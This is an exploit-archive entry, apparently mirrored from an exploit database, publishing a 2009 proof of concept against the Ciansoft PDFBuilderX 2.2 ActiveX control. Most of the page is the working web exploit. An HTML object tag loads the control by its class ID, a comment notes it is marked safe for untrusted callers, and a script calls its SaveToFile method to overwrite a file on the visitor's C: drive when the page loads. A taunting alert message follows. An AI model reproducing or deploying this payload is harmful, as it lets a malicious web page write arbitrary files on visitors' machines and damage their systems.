[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ciansoft PDFBuilderX 2.2 ActiveX Arbitrary File Overwrite Exploit
# Published : 2009-01-15
# Author : Alfons Luja
# Previous Title : MetaProducts MetaTreeX V 1.5.100 ActiveX File Overwrite Exploit
# Next Title : TeamSpeak <= 2.0.23.17 Remote File Disclosure Vulnerability
<b>
Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite <br/>
p0c <br/>
Alfons Luja <br/>
Pozdrowienia dla odFiecznych fan?¡°f <br/>
Tesw Eporue <br/>
-9002- <br/>
l00l <br/>
<b/>
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
/*
Class PDFDoc
GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False
vend0r : www.ciansoft.com
*/
try{
var obj = document.getElementById('kupa');
obj.AddPage(1);
obj.SaveToFile("C:/system_.ini");
window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){ window.alert('Poc failed'); }
</script>
# www.Syue.com [2009-01-15]